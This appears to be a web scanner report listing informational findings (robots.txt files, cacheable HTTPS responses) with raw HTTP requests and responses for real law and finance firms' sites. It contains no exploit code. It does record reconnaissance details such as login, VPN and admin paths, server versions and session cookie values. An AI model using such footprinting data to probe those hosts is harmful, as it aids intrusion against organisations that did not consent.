...[SNIP]...

25.33. http://www.privatemoneytalk.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.privatemoneytalk.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.privatemoneytalk.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:40 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://privatemoneytalk.com/xmlrpc.php
Set-Cookie: PHPSESSID=90e0f25853695845f09d2ae774dea406; path=/
Set-Cookie: sbmg_footerShowAfter=1; expires=Fri, 11-May-2012 11:02:45 GMT; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://privatemoneytalk.com/sitemap.xml.gz

25.34. http://www.stroock.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stroock.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.stroock.com

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: text/plain
Content-Location: http://www.stroock.com/robots.txt
Last-Modified: Fri, 16 Jul 2010 21:06:05 GMT
Accept-Ranges: bytes
ETag: "22798eb42a25cb1:295"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:21:44 GMT
Connection: close

User-agent: *
Allow: /
Disallow: /bios/

25.35. http://www.vcgate.com/Private-Equity.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vcgate.com
Path:   /Private-Equity.htm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vcgate.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 11:03:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Pingback: http://www.vcgate.com/xmlrpc.php
Content-Type: text/plain; charset=utf-8
Content-Length: 24

User-agent: *
Disallow:

25.36. http://www.vcprodatabase.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vcprodatabase.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.vcprodatabase.com

Response

HTTP/1.1 200 OK
Content-Length: 353
Content-Type: text/plain
Last-Modified: Wed, 30 May 2007 01:35:35 GMT
Accept-Ranges: bytes
ETag: "e54eb5d15aa2c71:5897"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:02:26 GMT
Connection: close

User-agent: *
Disallow: /2006macmyrupdate/
Disallow: /2006myrupdate/
Disallow: /2007annupdate/
Disallow: /2007macannupdate/
Disallow: /affiliates/
Disallow: /eusers/
Disallow: /files/
Disallo
...[SNIP]...

26. Cacheable HTTPS response
There are 23 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


26.1. https://ams-legal.net/support/blank.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /support/blank.htm

Request

GET /support/blank.htm HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://ams-legal.net/support/default.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK

Response

HTTP/1.1 200 OK
Content-Length: 195
Content-Type: text/html
Last-Modified: Wed, 02 Feb 2011 22:12:40 GMT
Accept-Ranges: bytes
ETag: "07c4c4e26c3cb1:2d4e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:32:27 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>Blank Page</title>
</head>
<body>
<!-- Blank Page -->
</body>
</html>

26.2. https://ams-legal.net/tuckerellis/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /tuckerellis/

Request

GET /tuckerellis/ HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 73
Content-Type: text/html
Content-Location: https://ams-legal.net/tuckerellis/Default.htm
Last-Modified: Mon, 18 Oct 2010 19:35:54 GMT
Accept-Ranges: bytes
ETag: "f43deadfb6ecb1:173e8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:25:28 GMT

<html>
<meta http-equiv="REFRESH" CONTENT="0; URL=default.asp">
</html>

26.3. https://ams-legal.net/tuckerellis/Image.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /tuckerellis/Image.asp

Request

GET /tuckerellis/Image.asp?Name=login-bar.png HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/Login.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQCDBTRB=PDGHIDNBEPFJCBKCFFIABLCC

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACBSASQD=NACKKCLBMLGHAKOHOFLAAKAL; path=/
Cache-control: private
Content-Length: 0


26.4. https://ams-legal.net/tuckerellis/blank.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ams-legal.net
Path:   /tuckerellis/blank.htm

Request

GET /tuckerellis/blank.htm HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQCDBTRB=PDGHIDNBEPFJCBKCFFIABLCC

Response

HTTP/1.1 200 OK
Content-Length: 195
Content-Type: text/html
Last-Modified: Mon, 18 Oct 2010 19:35:53 GMT
Accept-Ranges: bytes
ETag: "e5cea9adfb6ecb1:2d4e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 12:25:31 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>Blank Page</title>
</head>
<body>
<!-- Blank Page -->
</body>
</html>

26.5. https://cle-files.tuckerellis.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cle-files.tuckerellis.com
Path:   /

Request

GET / HTTP/1.1
Host: cle-files.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tuckerellis.com/info/client-access
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.9.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 12 May 2011 12:25:44 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: _filetransfer_session=bd9523d5f7e3fb1ae566f67f03d46ec0; path=/; expires=Thu, 19 May 2011 12:25:44 GMT; HttpOnly
Status: 200
ETag: "db2b9a193cf2f30f9560e02ce35abe4a"
X-Runtime: 33
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta htt
...[SNIP]...

26.6. https://cle-files.tuckerellis.com/password_reset

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cle-files.tuckerellis.com
Path:   /password_reset

Request

GET /password_reset HTTP/1.1
Host: cle-files.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cle-files.tuckerellis.com/
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.9.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West; _filetransfer_session=9f3e69b83e302794ac0d585e9faf9b16

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 12 May 2011 12:26:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: _filetransfer_session=9f3e69b83e302794ac0d585e9faf9b16; path=/; expires=Thu, 19 May 2011 12:26:02 GMT; HttpOnly
Status: 200
ETag: "c35a5d194717fba9ea024de383afe46e"
X-Runtime: 60
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 2532

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta htt
...[SNIP]...

26.7. https://cle-files.tuckerellis.com/register

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cle-files.tuckerellis.com
Path:   /register

Request

GET /register HTTP/1.1
Host: cle-files.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cle-files.tuckerellis.com/
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.9.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West; _filetransfer_session=9f3e69b83e302794ac0d585e9faf9b16

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 12 May 2011 12:25:59 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: _filetransfer_session=9f3e69b83e302794ac0d585e9faf9b16; path=/; expires=Thu, 19 May 2011 12:25:59 GMT; HttpOnly
Status: 200
ETag: "a849a16be06d2272b0f50b58f60ebb30"
X-Runtime: 36
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta htt
...[SNIP]...

26.8. https://investor.kkr.com/Recovery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://investor.kkr.com
Path:   /Recovery.aspx

Request

GET /Recovery.aspx HTTP/1.1
Host: investor.kkr.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:06:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7635


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...

26.9. https://investor.kkr.com/investor/login.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://investor.kkr.com
Path:   /investor/login.html

Request

GET /investor/login.html HTTP/1.1
Host: investor.kkr.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 75
Content-Type: text/html
Last-Modified: Wed, 29 Oct 2008 18:28:38 GMT
Accept-Ranges: bytes
ETag: "25223e29f439c91:1787"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 11:06:41 GMT

<body><script>
location.href="https://investor.kkr.com";
</script></body>

26.10. https://personal.vanguard.com/us/funds/snapshot

Summary

Severity:   Information
Confidence:   Certain
Host:   https://personal.vanguard.com
Path:   /us/funds/snapshot

Request

GET /us/funds/snapshot?FundId=0051&FundIntExt=INT&WT.srch=1?WT.srch=1 HTTP/1.1
Host: personal.vanguard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:09:22 GMT
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: TLTSID=4A6B94427C88107C0D0888D5141005F1; Path=/; Domain=.vanguard.com
Set-Cookie: TLTUID=4A6B94427C88107C0D0888D5141005F1; Path=/; Domain=.vanguard.com; Expires=Thu, 12-05-2021 11:09:22 GMT
Content-language: en
Set-cookie: JSESSIONID=0000NlNxb4pkRjQ9SuyVJzXRQ-V:15o5flja9; Path=/; Domain=.vanguard.com; Secure
Set-cookie: SSLB=0; Path=/; Domain=.vanguard.com
Set-Cookie: HNWPRD=D21;path=/;domain=.vanguard.com;
Content-Length: 62217



...[SNIP]...

26.11. https://services.sungarddx.com/admin/GetExternMedia.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://services.sungarddx.com
Path:   /admin/GetExternMedia.aspx

Request

GET /admin/GetExternMedia.aspx?DN=161476,1,Documents&MediaGuid=b5c415d7-82b3-4f6f-88e6-32e0157b8f64 HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
Referer: https://services.sungarddx.com/default.aspx?DN=3483,1,Documents&CommunityDN=161476,1,Documents
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; ASP.NET_SessionId=y0p1pwqsypoej3ybg3zrlm2v; ASPSESSIONIDAQBBSCRR=EAGLHBFBJGMGAJGCNKJEJDGG

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Date: Thu, 12 May 2011 11:41:05 GMT
Content-Length: 2937

GIF89a=."...................................................................................................z..u..s..k..i..e..a.._.Z{.Vx.Ps.Lp.Im.Ci.@f.<c.7_.6^.1Z.+U.'R}#O{!Mz.Jw.Gu.Et.Aq.?o=n    :k.
...[SNIP]...

26.12. https://services.sungarddx.com/common/js/AdminFunctions.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://services.sungarddx.com
Path:   /common/js/AdminFunctions.asp

Request

GET /common/js/AdminFunctions.asp HTTP/1.1
Host: services.sungarddx.com
Connection: keep-alive
Referer: https://services.sungarddx.com/Default.aspx?DN=1,Documents&URL=DN=161476,1,Documents
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerinvspdxweb001_002_003_004=2526607763.20480.0000; ASP.NET_SessionId=y0p1pwqsypoej3ybg3zrlm2v

Response

HTTP/1.1 200 OK
Cache-Control: PUBLIC
Content-Length: 6977
Content-Type: text/html
Expires: Thu, 12 May 2011 23:40:46 GMT
Last-Modified: Thu, 12 May 2011 11:40:46 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQBBSCRR=EAGLHBFBJGMGAJGCNKJEJDGG; path=/
Date: Thu, 12 May 2011 11:40:46 GMT


//<script language="javascript">
//<!--
///<summary>
///Misc administrative functions
///</summary>
///<scope>both</scope>


///<summary>
/// Used to get into the console and backend stuf
...[SNIP]...

26.13. https://virtualoffice.tuckerellis.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://virtualoffice.tuckerellis.com
Path:   /

Request

GET / HTTP/1.1
Host: virtualoffice.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tuckerellis.com/info/employee-access
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.11.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:33:53 GMT
Server: SonicWALL SSL-VPN Web Server
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: sslvpn_AOPortal_virtualoffice.tuckerellis.com=false; path=/;
Keep-Alive: timeout=20, max=25
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 173

<HTML>
<HEAD><meta http-equiv="refresh" content="0; URL=/cgi-bin/welcome">
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
</HEAD>
<BODY> </BODY>
</HTML>

26.14. https://webmail-us.mimecast.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://webmail-us.mimecast.com
Path:   /

Request

GET / HTTP/1.1
Host: webmail-us.mimecast.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tuckerellis.com/info/employee-access

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"210-1297546086000"
Last-Modified: Sat, 12 Feb 2011 21:28:06 GMT
Content-Type: text/html
Content-Length: 210
Date: Thu, 12 May 2011 12:34:16 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Redirecting</title>
<meta http-equiv="REFRESH" content="0;url=/webMail/login.jsp"></HEAD>
<BODY>
Redirecting
</BODY>
...[SNIP]...

26.15. https://ww3.janus.com/advisor/templates/blank.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww3.janus.com
Path:   /advisor/templates/blank.jsp

Request

GET /advisor/templates/blank.jsp HTTP/1.1
Host: ww3.janus.com
Connection: keep-alive
Referer: https://ww3.janus.com/advisor/about-janus?WT.mc_id=102162&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3eb3df310558d61360344c75b864; vj-ww3-advisor=3540783276.20480.0000; vj-ww3=3742109868.20480.0000; mbox=check#true#1305199510|session#1305199449262-866084#1305201310; WT_FPC=id=2083685a7025d04ca2e1305192254905:lv=1305192254905:ss=1305192254905

Response

HTTP/1.1 200 OK
Server:
X-Powered-By: JSP/2.1
Content-Type: text/html
Content-Length: 0
Date: Thu, 12 May 2011 11:24:15 GMT


26.16. https://www.opalgroup.net/forms/info_request/info_request.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.opalgroup.net
Path:   /forms/info_request/info_request.php

Request

GET /forms/info_request/info_request.php HTTP/1.1
Host: www.opalgroup.net
Connection: keep-alive
Referer: http://www.opalgroup.net/conferencehtml/current/alternative_investing_summit/alternative_investing_summit.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263800786.1305198075.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=263800786.1531298615.1305198075.1305198075.1305198075.1; __utmc=263800786; __utmb=263800786.1.10.1305198075; ysm_CK1LB5284PBIITG1JA527G8HOJM5S=ysm_PV1LB5284PBIITG1JA527G8HOJM5S:1&ysm_SN1LB5284PBIITG1JA527G8HOJM5S:1305198080505&ysm_LD1LB5284PBIITG1JA527G8HOJM5S:0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:09:33 GMT
Server: Apache/2.2.6 (Unix)
X-Powered-By: PHP/5.2.5
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 47178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

26.17. https://www.opalgroup.net/forms/register/register.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.opalgroup.net
Path:   /forms/register/register.php

Request

GET /forms/register/register.php HTTP/1.1
Host: www.opalgroup.net
Connection: keep-alive
Referer: http://www.opalgroup.net/sponsorinfo.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263800786.1305198075.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=263800786.1531298615.1305198075.1305198075.1305198075.1; __utmc=263800786; __utmb=263800786.1.10.1305198075; ysm_CK1LB5284PBIITG1JA527G8HOJM5S=ysm_PV1LB5284PBIITG1JA527G8HOJM5S:1&ysm_SN1LB5284PBIITG1JA527G8HOJM5S:1305198080505&ysm_LD1LB5284PBIITG1JA527G8HOJM5S:0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:09:45 GMT
Server: Apache/2.2.6 (Unix)
X-Powered-By: PHP/5.2.5
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- Google Website Optimi
...[SNIP]...

26.18. https://www.opalgroup.net/forms/suggestions/suggestions.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.opalgroup.net
Path:   /forms/suggestions/suggestions.php

Request

GET /forms/suggestions/suggestions.php HTTP/1.1
Host: www.opalgroup.net
Connection: keep-alive
Referer: https://www.opalgroup.net/forms/register/register.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=263800786.1305198075.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=263800786.1531298615.1305198075.1305198075.1305198075.1; __utmc=263800786; __utmb=263800786.1.10.1305198075; ysm_CK1LB5284PBIITG1JA527G8HOJM5S=ysm_PV1LB5284PBIITG1JA527G8HOJM5S:1&ysm_SN1LB5284PBIITG1JA527G8HOJM5S:1305198080505&ysm_LD1LB5284PBIITG1JA527G8HOJM5S:0

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:09:53 GMT
Server: Apache/2.2.6 (Unix)
X-Powered-By: PHP/5.2.5
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

26.19. https://www.usaa.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.usaa.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.usaa.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MemberGlobalSession=2:1002:4NZ4JENKZGDZY5ESDUSV; dcenv=DCITC

Response

HTTP/1.1 200 OK
